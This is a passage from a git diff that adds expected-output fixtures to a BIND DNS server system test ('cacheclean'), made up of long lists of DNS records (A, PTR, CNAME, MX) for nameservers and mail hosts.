IN CNAME +NS2.GLOBECOMM.net. IN A +UUNS1DNS1.FLONETWORK.com. IN A +GRIN.GNOSH.net. IN A +NS.DIGSYS.BG. IN A +uunet.UU.net. IN MX +ns1.vermontel.com. IN A +NS2.GREENMOUNTAINACCESS.net. IN A +38.241.5.198.IN-ADDR.ARPA. IN PTR +NS1.NIC.UK. IN A +DNS.FCCN.PT. IN A +NS2.NIC.TJ. IN A +NS4.NEWACCOUNT.com. IN A +NS2.IHUG.NET.NZ. IN A +NS.SIGNALZ.com. IN A +DNS.NIC.AD. IN A +3.2.39.137.IN-ADDR.ARPA. IN PTR +UUCP-GW-2.PA.DEC.com. IN A +NS.LANDLORDS.com. IN A +NS2.EXODUS.net. IN A +NS2.SCRUZ.net. IN A +NS.PIPEX-SZ.net. IN A +saturn.SUN.com. IN A +e24.nc.us.IBM.com. IN A +NMS.CYFRONET.KRAKOW.PL. IN A +NS.TWNIC.net. IN A +ns2.alcatel.NO. IN A +INPAKSODNS.AKSO.nps.GOV. IN A +mail.reptiles.org. IN A +59.187.152.204.IN-ADDR.ARPA. IN PTR +ns1.mobydark.com. IN A +NS.KG. IN A +NS.SPB.SU. IN A +PENDRAGON.CS.PURDUE.EDU. IN A +NS1.IGC.APC.org. IN A +USDNS.NIC.us. IN A +NS2.WEBTRENDS.com. IN A +URANUS.DAIMI.AAU.DK. IN A +ANTANA.IRD.MG. IN A +NS.JERSEY.juno.com. IN A +NS2.INTERNET-TOOLS.com. IN A +ns-tk012.ocn.AD.JP. IN A +bvt-ext.gdarm.com. IN A +NS1.ID. IN A +NS2.MAHNET.net. IN A +NS.ALCANET.COM.AU. IN A +UTAMA.BOLNET.BO. IN A +NS.CNC.AC.CN. IN A +NS.KREN.NE.KR. IN A +NS1.REDHAT.com. IN A +db.rc.VIX.com. IN A +198.103.198.209.IN-ADDR.ARPA. IN CNAME +alf.pbks.PL. IN A +FLAG.EP.net. IN A +DNS2.IUNET.IT. IN A +NS2.QUANTIFIED.net. IN A +INTERNET-SERVER.ZURICH.IBM.com. IN A +seaipsvcs.idx.com. IN A +lebanon.valley.net. IN A +SERVER.NORDU.net. IN A +NS.NIC.DO. IN A +isc-01.iscvt.org. IN A +NAC.NO. IN A +SAVA.UTIC.NET.BA. IN A +NS1.TOKYO.JP.NETDNS.com. IN A +NETSERV2.ITS.rpi.EDU. IN A +IFI.UIO.NO. IN A +www.TOAPLAN.com. IN A +ns2.the-frontier.org. IN A +NS.UNAM.MX. IN A +ARISTO.TAU.AC.IL. IN A +DNS.CS.WISC.EDU. IN A +NS1.NIC.IR. IN A +NS1.RETINA.AR. IN A +mailer.connriver.net. IN A +NS.ATI.TN. IN A +NS2.CLEAR.NET.NZ. IN A +NS4.EARTHLINK.net. IN A +mejac.palo-alto.ca.us. IN A +New-York4.NY.ALTER.net. IN A +falcon.tallship.net. IN A +ZEUS.CC.UCY.AC.CY. IN A +NS2.SECURE.net. 
IN A +NS0.FLIRBLE.org. IN A +dns.zenon.net. IN A +SERVIDOR.MICROASTUR.ES. IN A +DOWNSTAGE.MCS.VUW.AC.NZ. IN A +ns2.GNAC.com. IN A +PRIFI.EUNET.FI. IN A +ns2.k12.vt.us. IN A +ns2.nic.mnet. IN A +NS0.PIPEX.net. IN A +NS1.SANFRANCISCO.US.NETDNS.com. IN A +AMRA.NIC.GOV.JO. IN A +kw.com.CN. IN MX +SHNS.163.net. IN A +NS.ER.USGS.GOV. IN A +FAITH.MYNET.net. IN A +mail.smuggs.com. IN A +MIMOS.MY. IN A +NS.GU. IN A +mx00.schlund.de. IN A +CADDSYS.IPTEK.net. IN A +NS0.TELIA.NIC.NU. IN A +NS2.GRANITECANYON.com. IN A +GATEKEEPER.corning.com. IN A +NS2.2DAY.com. IN A +1.0.0.127.IN-ADDR.ARPA. IN PTR +RAIN.PSG.com. IN A +STRAWB.MIT.EDU. IN A +NS2.DIGISERVE.com. IN A +UMACSN2.UMAC.MO. IN A +NS.JM. IN A +12.153.66.206.IN-ADDR.ARPA. IN PTR +EAST.ISI.EDU. IN A +NS2.UUNET.CA. IN A +SUNNY.STAT-USA.GOV. IN A +BOW.INTNET.CF. IN A +NS4.TELE.DK. IN A +NS2.sodak.net. IN A +NS1.NEWYORK.US.NETDNS.com. IN A +NS2.PSI.net. IN A +NS.KREONET.RE.KR. IN A +GIANT.MINDLINK.net. IN A +NS0.SECTOR001.org. IN A +DNS.SEABONE.net. IN A +NS2.MANA.PF. IN A +NRWEB.CENPAC.NET.NR. IN A +www.TRAVELPHOTOCONTESTS.com. IN A +NS1.REGEX.com. IN A +BIGBIRD.ITD.nps.GOV. IN A +CUNIXD.CC.COLUMBIA.EDU. IN A +NS1.CLASSIFIEDMONSTER.com. IN A +SERVER1.SANS.org. IN A +BRONZE.COIL.com. IN A +SCSNMS.SWITCH.CH. IN A +SCE.CNC.UNA.PY. IN A +RELAY.LA.TIS.com. IN A +NS.AUSTIN.IBM.com. IN A +SERVICE.robert-morris.EDU. IN A +MERCURY.ML.org. IN A +proxy.pccf.net. IN A +DUB-NAME-SVC-1.compuserve.com. IN A +NS.CNRI.reston.va.us. IN A +NS.UCAD.SN. IN A +ns01.ny.us.ibm.net. IN A +NS4-AUTH.ALASKA.net. IN A +BOW.INTNET.NE. IN A +NS-JP.SINET.AD.JP. IN A +ns.musin.de. IN A +ip1.romkey.SEG.net. IN A +DNS2.ITD.UMICH.EDU. IN A +mail.rpi.EDU. IN A +INECO.NIC.ES. IN A +DNS2.FIREHOUSE.net. IN A +BOW.INTNET.BJ. IN A +sundown.vtc.VSC.EDU. IN A +NIC.AIX.GR. IN A +NIC.AD.JP. IN A +NS.DC.IGC.org. IN A +LHR.NS.GDNS.net. IN A +NS2.WEBMAGIC.net. IN A +MUNNARI.OZ.AU. IN A +HIPPO.RU.AC.ZA. IN A +PEBBLES.IOM.com. IN A +penpal.dmz.RPSLMC.EDU. 
IN A
+netnews.HINET.net. IN A
+INS2.TOSA.TWTELECOM.net. IN A
+proxy6.cisco.com. IN A
+NS2.HOST4U.net. IN A
+POIPARAU.OYSTER.NET.CK. IN A
+NS-EXT.VIX.com. IN A
+NS2.NURSAT.net. IN A
+mail2.kw.com.CN. IN A
+NS-02B.ANS.net. IN A
+DNS.RCCN.net. IN A
+B.ROOT-SERVERS.ORSC. IN A
+FIREHOUSE.net. IN A
diff --git a/bin/tests/system/cacheclean/knowngood.dig.out b/bin/tests/system/cacheclean/knowngood.dig.out
new file mode 100644
index 0000000..a0f087e
--- /dev/null
+++ b/bin/tests/system/cacheclean/knowngood.dig.out
@@ -0,0 +1,953 @@ +YA.AKAMAI.com. 604800 IN A 204.178.118.68 +UPR1.UPR.CLU.EDU. 604800 IN A 136.145.1.4 +integra.s-integra.co.JP. 604800 IN A 210.162.202.34 +avalon.iks-jena.de. 604800 IN A 194.221.90.34 +NS1.GLOBALDNS.com. 604800 IN A 206.253.214.11 +NS.RDU.BELLSOUTH.net. 604800 IN A 205.152.32.20 +ns.space.net. 604800 IN A 195.30.0.1 +SUN.MHS-RELAY.AC.UK. 604800 IN A 128.86.8.25 +AYAX.UNIANDES.EDU.CO. 604800 IN A 157.253.50.30 +DNS.NIC.CD. 604800 IN A 194.38.74.11 +NS.DNS.PT. 604800 IN A 193.136.0.1 +NS1.INTERNETSHARE.com. 604800 IN A 63.207.108.53 +MASTER.DNS.BE. 604800 IN A 194.7.171.243 +CATAMOUNT.middlebury.EDU. 604800 IN A 140.233.2.204 +FM03.FM. 604800 IN A 206.49.89.4 +NAAMAK.NCST.ERNET.IN. 604800 IN A 202.41.110.66 +gateway2.BFG.com. 604800 IN A 166.102.214.66 +NS3.NS.ESAT.net. 604800 IN A 192.111.39.100 +DNS1.INTUIT.com. 604800 IN A 208.157.255.4 +DEN-NS2.FWIDCSERVICES.net. 604800 IN A 216.7.160.32 +SOL.UNDPBI.TELEPAC.net. 604800 IN A 194.65.87.2 +NS2.tridog.com. 604800 IN A 206.168.112.51 +DNS2.KW. 604800 IN A 161.252.48.150 +NS2.MAIL.com. 604800 IN A 165.251.1.3 +NS.FIRSTCOM.CL. 604800 IN A 200.27.2.2 +DNS4.QUICKEN.com. 604800 IN A 198.3.99.252 +bofh.cid.net. 604800 IN A 212.172.21.254 +NS1.KRNIC.net. 604800 IN A 202.30.50.51 +NS2.SR.net. 604800 IN A 200.1.156.11 +NS1.TELSTRA.net. 604800 IN A 139.130.4.5 +ns.cafax.SE. 604800 IN A 192.71.228.17 +NS1.DNS.NET.NZ. 604800 IN A 202.46.161.3 +NS.CONCOURSE.com. 604800 IN A 199.218.113.2 +35.32/27.110.16.12.IN-ADDR.ARPA. 604800 IN PTR mail.nova-data.com. +CCC.champcable.com. 604800 IN A 207.41.53.11 +NS.RIPE.net. 604800 IN A 193.0.0.193 +NS.NIC.NU. 604800 IN A 128.11.47.50 +KIM.CAMNET.CM. 604800 IN A 195.24.192.35 +DOGON.SOTELMA.net. 604800 IN A 208.144.230.1 +DNS02.FLAME.org. 604800 IN A 204.152.184.97 +NS.MIA.BELLSOUTH.net. 604800 IN A 205.152.16.20 +mail.ok.RU. 604800 IN A 195.2.83.162 +NS.NIC.MX. 604800 IN A 200.23.1.1 +NS2.BERKELEY.EDU. 604800 IN A 128.32.136.12 +NS2.BERKELEY.EDU. 
604800 IN A 128.32.206.12 +SHIKHAR.MOS.COM.NP. 604800 IN A 202.52.255.5 +noc.rrz.Uni-Koeln.de. 604800 IN A 134.95.100.209 +NS.KORNET.net. 604800 IN A 168.126.63.1 +keith.gazpacho.org. 604800 IN A 209.67.235.37 +NS2.appliedtheory.com. 604800 IN A 168.75.17.11 +NS.CERNET.net. 604800 IN A 202.112.0.44 +smtp.ELISTX.com. 604800 IN A 209.116.252.130 +NS-AIT.THNIC.net. 604800 IN A 192.41.170.219 +from.PL. 604800 IN A 212.160.132.114 +mailhub.icann.org. 604800 IN A 192.0.34.33 +SEC1.DNS.UK.PSI.net. 604800 IN A 154.32.105.34 +isrv3-i.isc.org. 604800 IN A 204.152.184.87 +PHLOEM.UOREGON.EDU. 604800 IN A 128.223.32.35 +CTINA.AR. 604800 IN A 200.16.97.17 +DNS2.IAM.NET.MA. 604800 IN A 212.217.0.12 +10.126.39.137.IN-ADDR.ARPA. 604800 IN PTR Fddi0-0.New-York4.NY.ALTER.NET. +DNS.PRINCETON.EDU. 604800 IN A 128.112.129.15 +NS.BELLSOUTH.net. 604800 IN A 205.152.0.5 +NS1.SNS-FELB.DEBIS.com. 604800 IN A 53.122.1.10 +localhost. 604800 IN A 127.0.0.1 +hm6.vt.highmeadow.com. 604800 IN A 207.136.209.6 +SYRUP.hill.com. 604800 IN A 208.162.106.3 +NS99.WAIKATO.AC.NZ. 604800 IN A 130.217.76.27 +NS4.CW.net. 604800 IN A 204.70.49.234 +NS2.SLOWMOE.com. 604800 IN A 137.118.8.50 +ns2.hypa.net. 604800 IN A 63.160.181.11 +ns.sxtyptt.NET.CN. 604800 IN A 202.99.192.68 +NS2.MERCHANTWARE.com. 604800 IN A 209.170.142.35 +uunymdgds1.DOUBLECLICK.net. 604800 IN A 206.65.183.21 +e34.co.us.IBM.com. 604800 IN A 32.97.110.132 +kista.dns.swip.net. 604800 IN A 192.71.220.9 +ZEBRA.UEM.MZ. 604800 IN A 196.3.96.67 +NET2.GENDYN.com. 604800 IN A 204.60.171.9 +NS0.UTK.EDU. 604800 IN A 160.36.0.66 +NS.RELCOM.EU.net. 604800 IN A 193.124.23.3 +DNS0.AXION.BT.CO.UK. 604800 IN A 132.146.5.1 +mail.vhv.com. 604800 IN A 208.5.161.11 +DNS4.UK.MSFT.net. 604800 IN A 213.199.144.152 +NS2.ADNS.net. 604800 IN A 199.5.157.3 +NS1.SEATTLE.US.NETDNS.com. 604800 IN A 206.253.214.13 +NS2.UNIVIE.AC.at. 604800 IN A 193.171.255.66 +NS15B.BOCA15-VERIO.com. 604800 IN A 208.55.91.51 +www.BAYAREA.com. 604800 IN CNAME vh80040.vh8.infi.net. 
+ns4.onemain.com. 604800 IN A 63.208.210.11 +NS2.EDIGITALS.com. 604800 IN A 211.39.139.36 +MICHAEL.VATICAN.VA. 604800 IN A 212.77.0.2 +AUSTIN.GH.com. 604800 IN A 196.3.64.1 +sld-ns2.CNNIC.NET.CN. 604800 IN A 202.97.16.197 +NS2.CDC.GOV. 604800 IN A 198.246.96.92 +NS.WATSON.IBM.com. 604800 IN A 198.81.209.2 +NS.NIC.SH. 604800 IN A 194.205.62.60 +NS2.BAHNHOF.net. 604800 IN A 212.85.64.4 +NS-AUTH2.cmates.com. 604800 IN A 208.23.213.3 +ISDMNL.WR.USGS.GOV. 604800 IN A 130.118.4.2 +NS2.COBEX.net. 604800 IN A 207.102.129.72 +MERLE.CIRA.CA. 604800 IN A 64.26.149.98 +NS.UVG.EDU.GT. 604800 IN A 168.234.68.2 +NS1.CWVA.DOUBLECLICK.net. 604800 IN A 205.138.3.20 +eliot.diebold.com. 604800 IN A 204.151.249.21 +NS.ALMADEN.IBM.com. 604800 IN A 198.4.83.35 +NS2.INTERNETSQUARE.com. 604800 IN A 205.227.232.9 +mail.QUEST-NET.com. 604800 IN A 207.140.30.11 +Z1.NS.LHR1.GLOBIX.net. 604800 IN A 212.111.32.38 +DNS1.AVANTEL.NET.MX. 604800 IN A 200.33.213.66 +vh80040.vh8.INFI.net. 604800 IN A 209.97.59.245 +NS.LEB.net. 604800 IN A 206.127.55.2 +NS.DCC.UCHILE.CL. 604800 IN A 146.83.5.204 +CLOUSO.RISQ.QC.CA. 604800 IN A 192.26.210.1 +muenster.westfalen.de. 604800 IN A 193.174.5.2 +us.a1.YIMG.com. 604800 IN CNAME a32.g.a.YIMG.com. +NS.DEMOS.SU. 604800 IN A 194.87.0.8 +NS.DEMOS.SU. 604800 IN A 194.87.0.9 +south.NAVPOINT.com. 604800 IN A 207.106.42.12 +netconsult.netconx.de. 604800 IN A 193.141.75.1 +DNS2.btinternet.com. 604800 IN A 194.73.73.94 +NS2.CINE.net. 604800 IN A 207.168.250.12 +castor.cmc.ec.gc.CA. 604800 IN A 142.135.4.14 +EX2-DNS0.AVENUEA.com. 604800 IN A 216.34.88.20 +firewall3.glaxowellcome.com. 604800 IN A 192.58.204.207 +MACU.MA.MT.NP.ELS-GMS.att.net. 604800 IN A 199.191.145.136 +NS.PA. 604800 IN A 168.77.8.2 +TGSERV.TELE.GL. 604800 IN A 194.177.224.7 +KYNSE02.MESSAGESECURE.com. 604800 IN A 216.142.252.201 +GORGON.XTRA.CO.NZ. 604800 IN A 202.27.158.34 +DNS.NIC.IT. 604800 IN A 193.205.245.5 +pop.VERMONTEL.net. 604800 IN CNAME loomis.VERMONTEL.net. +NS2.REGISTRY.HM. 
604800 IN A 209.54.168.55 +NAMESERVER1.CONCENTRIC.net. 604800 IN A 207.155.183.73 +47.131.127.204.IN-ADDR.ARPA. 604800 IN PTR mtiwmhc22.worldnet.att.net. +mailhost.tfm.com. 604800 IN A 192.231.224.11 +NS1.MRC.GM. 604800 IN A 212.60.69.1 +NS.WIDE.AD.JP. 604800 IN A 203.178.136.63 +NS.BTA.NET.CN. 604800 IN A 202.96.0.133 +NS2.ISPC.org. 604800 IN A 209.124.64.11 +BOW.RAIN.FR. 604800 IN A 194.51.3.49 +srs.srs.state.vt.us. 604800 IN A 159.105.101.150 +NS4.WEB2010.com. 604800 IN A 216.157.55.6 +NS.TELECOM.NET.ET. 604800 IN A 196.27.22.43 +NS1.DNS.NET.KH. 604800 IN A 203.127.100.21 +GATEN.JARING.MY. 604800 IN A 161.142.227.17 +shell.nominum.com. 604800 IN A 204.152.187.59 +CHEOPS.ANU.EDU.AU. 604800 IN A 150.203.224.24 +VANGOGH.CS.BERKELEY.EDU. 604800 IN A 128.32.33.5 +NS2.NOC.NULLUS.net. 604800 IN A 63.119.253.254 +NIC.LTH.SE. 604800 IN A 130.235.20.3 +ns.farm.net. 604800 IN A 216.112.179.160 +NS.USEC.SUN.com. 604800 IN A 192.9.48.3 +NS2.YOUR-DOMAIN.com. 604800 IN A 216.167.31.177 +DNS-EAST.PREP.net. 604800 IN A 129.250.252.10 +ns.hcr.net. 604800 IN A 208.240.246.4 +NS-RCH.nortelnetworks.com. 604800 IN A 192.135.215.2 +crl.DEC.com. 604800 IN A 192.58.206.2 +NS.PIXAR.ES. 604800 IN A 194.143.196.3 +MEX1-M-213.UNINET.NET.MX. 604800 IN A 200.33.146.213 +NS.ITU.CH. 604800 IN A 156.106.192.121 +matrix.uwm.EDU.PL. 604800 IN A 213.184.3.136 +gateway1.gmcr.com. 604800 IN A 12.34.108.130 +NS2.DNS.BR. 604800 IN A 200.19.119.99 +foxharp.boston.MA.us. 604800 IN MX 10 bparker.connactivity.com. +Quest-7.symquest.com. 604800 IN A 64.69.102.131 +NS2.VERIO.net. 604800 IN A 129.250.31.190 +NAME.IAD.GBLX.net. 604800 IN A 204.152.166.155 +NS2.EMIRATES.NET.AE. 604800 IN A 194.170.1.7 +supai.oit.UMASS.EDU. 604800 IN A 128.119.175.6 +QUERN.EPILOGUE.com. 604800 IN A 128.224.1.136 +NS3.TOPICA.com. 604800 IN A 206.111.131.72 +NS1.JERKY.net. 604800 IN A 204.57.55.100 +JTB.BRUNET.BN. 604800 IN A 202.160.8.2 +AUTH100.NS.UU.net. 604800 IN A 198.6.1.202 +BOW.INTNET.DJ. 
604800 IN A 193.251.143.253 +OSI2.GUA.net. 604800 IN A 205.161.188.3 +AZMODAN.ULA.VE. 604800 IN A 150.185.130.16 +THUMPER.RPSLMC.EDU. 604800 IN A 144.74.22.8 +ICHU.RCP.NET.PE. 604800 IN A 161.132.5.14 +NS.NIC.AC. 604800 IN A 194.205.62.120 +DNS.NETFLIGHT.com. 604800 IN A 207.88.32.2 +ns2.UTORONTO.CA. 604800 IN A 128.100.102.202 +mail.giffordmed.org. 604800 IN A 130.189.100.51 +RATA.VUW.AC.NZ. 604800 IN A 130.195.2.11 +NS-2.ADMONITOR.net. 604800 IN A 216.35.185.40 +NCC.MOC.KW. 604800 IN A 196.1.69.98 +NS.EUNET.ES. 604800 IN A 193.127.1.11 +NS3.best.com. 604800 IN A 209.24.149.42 +zip.MAIL-LIST.com. 604800 IN MX 5 zip.MAIL-LIST.com. +zip.MAIL-LIST.com. 604800 IN MX 20 sluice.MAIL-LIST.com. +zip.MAIL-LIST.com. 604800 IN MX 20 pipeline.MAIL-LIST.com. +zip.MAIL-LIST.com. 604800 IN MX 20 transport.MAIL-LIST.com. +zip.MAIL-LIST.com. 604800 IN MX 50 brisk.MAIL-LIST.com. +zip.MAIL-LIST.com. 604800 IN MX 50 swifty.MAIL-LIST.com. +zip.MAIL-LIST.com. 604800 IN MX 50 velocity.MAIL-LIST.com. +JATZ.AARNET.EDU.AU. 604800 IN A 139.130.204.4 +DNS2.MAN.LODZ.PL. 604800 IN A 212.51.192.5 +NS.VERITAS.com. 604800 IN A 204.177.156.38 +218.241.103.199.IN-ADDR.ARPA. 604800 IN PTR abyssinian.sleepycat.com. +BOW.SNPT.KM. 604800 IN A 195.101.19.253 +Z1.NS.SJC1.GLOBIX.net. 604800 IN A 209.10.34.55 +DNS.NIC.TT. 604800 IN A 24.3.198.194 +MAKISIG.IPHIL.net. 604800 IN A 203.176.28.135 +NS.DK.net. 604800 IN A 193.88.44.42 +NS.NI. 604800 IN A 200.30.36.8 +NS.NI. 604800 IN A 165.98.1.2 +CIUP1.NCC.UP.PT. 604800 IN A 193.136.51.52 +ns2.verisign-grs.com. 604800 IN A 198.41.3.108 +NS1.UMASS.EDU. 604800 IN A 128.119.166.14 +NS.NEWACCOUNT.net. 604800 IN A 216.121.96.26 +UDNS2.ULTRADNS.net. 604800 IN A 204.74.101.1 +NS2.LATNET.LV. 604800 IN A 159.148.108.1 +info-server.surrey.AC.UK. 604800 IN A 131.227.102.6 +NS2.SQUONK.net. 604800 IN A 63.84.12.135 +NS2.DSO.net. 604800 IN A 206.16.77.11 +www.energyenhancement.org. 604800 IN A 216.121.175.228 +DNS1.BD. 604800 IN A 209.58.24.5 +nl.COMPUWARE.com. 
604800 IN MX 150 uucp.nl.net. +nl.COMPUWARE.com. 604800 IN MX 50 bitbucket.extern.uniface.nl. +nl.COMPUWARE.com. 604800 IN MX 100 smtp.nl.net. +NS.DHIRAAGU.MV. 604800 IN A 202.1.192.196 +TRANTOR.UMD.EDU. 604800 IN A 128.8.10.14 +NS.ALCANET.NO. 604800 IN A 193.213.238.10 +Z6.MSFT.AKADNS.com. 604800 IN A 207.229.152.20 +NS4.ync.net. 604800 IN A 206.185.20.9 +CMTU.MT.NS.ELS-GMS.att.net. 604800 IN A 12.127.16.69 +vh40099.vh4.INFI.net. 604800 IN A 209.97.59.121 +ns2.secondary.nl. 604800 IN A 194.229.138.6 +abyssinian.sleepycat.com. 604800 IN A 199.103.241.218 +APHEX.MENTOR.BE. 604800 IN A 193.121.64.5 +webmail.fiberia.com. 604800 IN A 216.55.147.2 +localhost.moonmothers.com. 604800 IN A 127.0.0.1 +NS2.DNS.LU. 604800 IN A 158.64.229.3 +NS.VISUALCOM.ES. 604800 IN A 194.143.202.202 +TONIC.TO. 604800 IN A 206.184.59.10 +NS1.CRSNIC.net. 604800 IN A 198.41.3.39 +trurl.ispid.com.PL. 604800 IN A 195.150.99.3 +datingagentur.de. 604800 IN A 212.227.216.57 +NS2.NSIREGISTRY.net. 604800 IN A 198.41.3.108 +ICE.VIA-NET-WORKS.IE. 604800 IN A 212.17.32.2 +sgi1.map.com. 604800 IN A 204.71.19.20 +NS0.HS0.U-NET.net. 604800 IN A 194.119.128.70 +candle.pha.pa.us. 604800 IN A 162.33.245.46 +NS1.PACIFIC.NET.SG. 604800 IN A 192.169.33.3 +NS.CENIAI.NET.CU. 604800 IN A 169.158.128.136 +NS2.UUCP.NE.JP. 604800 IN A 210.141.111.69 +za.akamaitech.net. 604800 IN A 204.178.107.226 +NS.UCR.AC.CR. 604800 IN A 163.178.88.2 +DNS-02.NS.cs.com. 604800 IN A 205.188.157.235 +dns2.primary.net. 604800 IN A 205.242.187.235 +PAPPSRV.PAPP.UNDP.org. 604800 IN A 192.115.229.1 +NS1.REGME.com. 604800 IN A 207.153.57.14 +DNS.CS.KULEUVEN.AC.BE. 604800 IN A 134.58.40.4 +NS1.VERMONTLAW.net. 604800 IN A 63.89.26.15 +mail.garmontusa.com. 604800 IN A 64.30.8.178 +NS2.SAIPAN.com. 604800 IN A 202.128.28.2 +NS.ARICATRA.com. 604800 IN A 206.64.112.114 +ns2.reedmedia.net. 604800 IN A 209.241.86.6 +NS.NETLAB.SK. 604800 IN A 195.168.1.4 +RELAY.GW.tislabs.com. 604800 IN A 192.94.214.100 +b.ns.tmcs.net. 
604800 IN A 209.104.33.252 +NS1.IBL.BM. 604800 IN A 199.172.192.1 +ok.RU. 604800 IN A 195.2.83.162 +NS.RICC.ALMA-ATA.SU. 604800 IN A 194.87.112.4 +KITKA.MARNET.MK. 604800 IN A 194.149.131.2 +dasher.dartmouth.EDU. 604800 IN A 129.170.208.6 +NS0.PLANET-THREE.com. 604800 IN A 212.49.219.164 +KNOCK.SER.BBNPLANET.net. 604800 IN A 192.239.16.129 +tornado.webtech.elk.PL. 604800 IN A 212.244.162.100 +AUTH2.NS.IDT.net. 604800 IN A 169.132.133.1 +host3.VTLEGALAID.org. 604800 IN A 207.136.208.115 +NS.EUNET.SK. 604800 IN A 192.108.130.33 +TULKU.NIC.AR. 604800 IN A 200.16.97.77 +RELAY.CDNNET.CA. 604800 IN A 192.73.5.1 +DNS2.TPSA.PL. 604800 IN A 194.204.152.34 +enterprise.wirbel.com. 604800 IN A 194.231.54.2 +ECNET.EC. 604800 IN A 157.100.45.2 +ENGINE1.UNA.net. 604800 IN A 208.136.52.74 +WYCU.WY.BR.NP.ELS-GMS.att.net. 604800 IN A 199.191.128.43 +ARWENA.NASK.WAW.PL. 604800 IN A 193.59.201.28 +PAC2.NIPR.MIL. 604800 IN A 199.252.155.234 +DAISY.EE.UND.AC.ZA. 604800 IN A 146.230.192.18 +odin.ietf.org. 604800 IN A 132.151.1.176 +dns.kaben-net.de. 604800 IN A 195.179.28.17 +NS2.ALTAVISTA.com. 604800 IN A 209.73.164.7 +CASTOR.TELEGLOBE.net. 604800 IN A 199.202.55.2 +CIR.RED.SV. 604800 IN A 168.243.254.1 +PIJIN.COM.SB. 604800 IN A 202.139.42.10 +NS4.CTCCOM.net. 604800 IN A 64.69.100.35 +NS1.SOL.NO. 604800 IN A 195.225.2.10 +DNS2.TK.MSFT.net. 604800 IN A 207.46.232.38 +NS.BSDI.com. 604800 IN A 207.174.116.8 +NS.SVIANED.nl. 604800 IN A 143.177.1.3 +NS.NOVELL.com. 604800 IN A 137.65.1.1 +NS.LUCKY.net. 604800 IN A 193.193.193.100 +SJC-NS2.SJC.LYCOS.com. 604800 IN A 206.79.171.40 +NS1.OP.net. 604800 IN A 209.152.193.4 +worldnet.att.net. 604800 IN A 199.70.151.234 +APIES.FRD.AC.ZA. 604800 IN A 137.214.80.1 +mail.skiinsurance.com. 604800 IN A 207.136.205.152 +NS.BELNET.BE. 604800 IN A 193.190.198.2 +NS.BELNET.BE. 604800 IN A 193.190.198.10 +KOMO.INET.GA. 604800 IN A 208.148.44.1 +EARTH.THEPLANET.net. 604800 IN A 195.92.195.222 +VASCO.USMA.AC.PA. 604800 IN A 208.141.92.2 +GODFEVER.DCCSERVER.com. 
604800 IN A 208.137.22.6 +BOS-NS2.BOS.LYCOS.com. 604800 IN A 209.67.228.40 +NS2.GOTO.com. 604800 IN A 204.71.128.137 +NS1.overstock.com. 604800 IN A 207.225.194.13 +NS1-PUBLIC.ZMA.COMPAQ.com. 604800 IN A 161.114.64.24 +ns.ilovedomain.com. 604800 IN A 211.175.164.170 +ns1.anycast.net. 604800 IN A 216.196.51.4 +PASCAL.UPRR.PR. 604800 IN A 134.202.1.120 +NS3-AUTH.SPRINTLINK.net. 604800 IN A 144.228.255.10 +NS1-Y.DNS.PIPEX.net. 604800 IN A 158.43.193.89 +prue.eim.surrey.AC.UK. 604800 IN A 131.227.76.5 +TROLL-GW.GATECH.EDU. 604800 IN A 130.207.244.251 +NS.SIERRATEL.SL. 604800 IN A 194.133.124.5 +ns2.PSHIFT.com. 604800 IN A 208.153.85.21 +NS.ERS.IBM.com. 604800 IN A 204.146.173.35 +ASLAN.OPEN-RSC.org. 604800 IN A 199.5.157.128 +NS2.DOMAIN-REGISTRY.nl. 604800 IN A 193.176.144.130 +uranus.lan-ks.de. 604800 IN A 194.45.71.1 +mail.unlisys.net. 604800 IN A 195.21.255.252 +NS.AUSTRIA.EU.net. 604800 IN A 192.92.138.35 +AUTH01.CONNECT.IE. 604800 IN A 194.106.128.50 +SUN.SCSI.GOV.BY. 604800 IN A 195.50.5.103 +NS1.SIGMAHOSTING.com. 604800 IN A 209.241.86.6 +NS.CAST.EDU.JM. 604800 IN A 200.9.115.2 +DS.NIC.NET.SG. 604800 IN A 202.42.194.205 +PRADES.CESCA.ES. 604800 IN A 192.94.163.152 +ns.sta.NET.CN. 604800 IN A 202.96.199.133 +NSE00.excite.com. 604800 IN A 198.3.102.250 +NS3.ABOVE.net. 604800 IN A 207.126.105.146 +CASBAH.ELDJAZAIR.NET.DZ. 604800 IN A 193.194.81.45 +ASKIA.SOTELMA.ML. 604800 IN A 208.144.230.3 +NS.IDT.net. 604800 IN A 198.4.75.100 +FXCLPR02.IS.CHRYSLER.com. 604800 IN A 204.189.94.37 +SVC00.APNIC.net. 604800 IN A 202.12.28.131 +NS5.DCX.YAHOO.com. 604800 IN A 216.32.74.10 +ns1.ray.net. 604800 IN A 195.238.228.131 +NS.NIC.MC. 604800 IN A 195.78.6.131 +ns.runway.CN.net. 604800 IN A 211.101.132.8 +benoni.uit.NO. 604800 IN A 129.242.4.254 +SCRATCHY.MINDSPRING.net. 604800 IN A 207.69.200.211 +ns1.pcode.com. 604800 IN A 216.15.192.135 +ns1.aha.RU. 604800 IN A 195.2.80.142 +ns2.uwaterloo.CA. 604800 IN A 129.97.128.100 +ns2.NIC.AD.JP. 
604800 IN A 202.12.30.133 +a.ns.foxharp.boston.MA.us. 604800 IN A 24.147.209.205 +NS.NIC.IO. 604800 IN A 194.205.62.100 +A-GTLD-SERVERS.dot-god.com. 604800 IN A 205.189.73.123 +SMTP.slac.stanford.EDU. 604800 IN A 134.79.18.80 +52.87.198.209.IN-ADDR.ARPA. 604800 IN PTR mqueue0.sover.net. +BARNEY.ADVSYS.CO.UK. 604800 IN A 194.72.124.2 +NS1.TELEPAC.PT. 604800 IN A 194.65.3.20 +NICOSIA.CCS.UCY.AC.CY. 604800 IN A 194.42.6.97 +NS.PUNCHDOWN.org. 604800 IN A 140.174.131.100 +SYNAESTHESIA.COGNOSCENTI.org. 604800 IN A 207.208.112.4 +NS2.PLANET-THREE.net. 604800 IN A 212.49.219.190 +DNS.CIT.CORNELL.EDU. 604800 IN A 192.35.82.50 +MODOR.VERISIGN.net. 604800 IN A 205.139.94.55 +SUNSTROKE.IS.RPSLMC.EDU. 604800 IN A 144.74.21.8 +NS2.SEG.net. 604800 IN A 206.34.181.16 +NEMUNAS.SC-UNI.KTU.LT. 604800 IN A 193.219.32.13 +MULGA.CS.MU.OZ.AU. 604800 IN A 128.250.1.22 +MULGA.CS.MU.OZ.AU. 604800 IN A 128.250.37.150 +NS1.NPLUS.GF. 604800 IN A 195.6.144.3 +ns2.centralinfo.net. 604800 IN A 63.102.204.130 +K.GTLD-SERVERS.net. 604800 IN A 213.177.194.5 +ns1.codelocal.com. 604800 IN A 216.15.192.130 +NS2.IPNS.com. 604800 IN A 63.230.183.1 +NS0.DE.NIC.NU. 604800 IN A 216.200.116.40 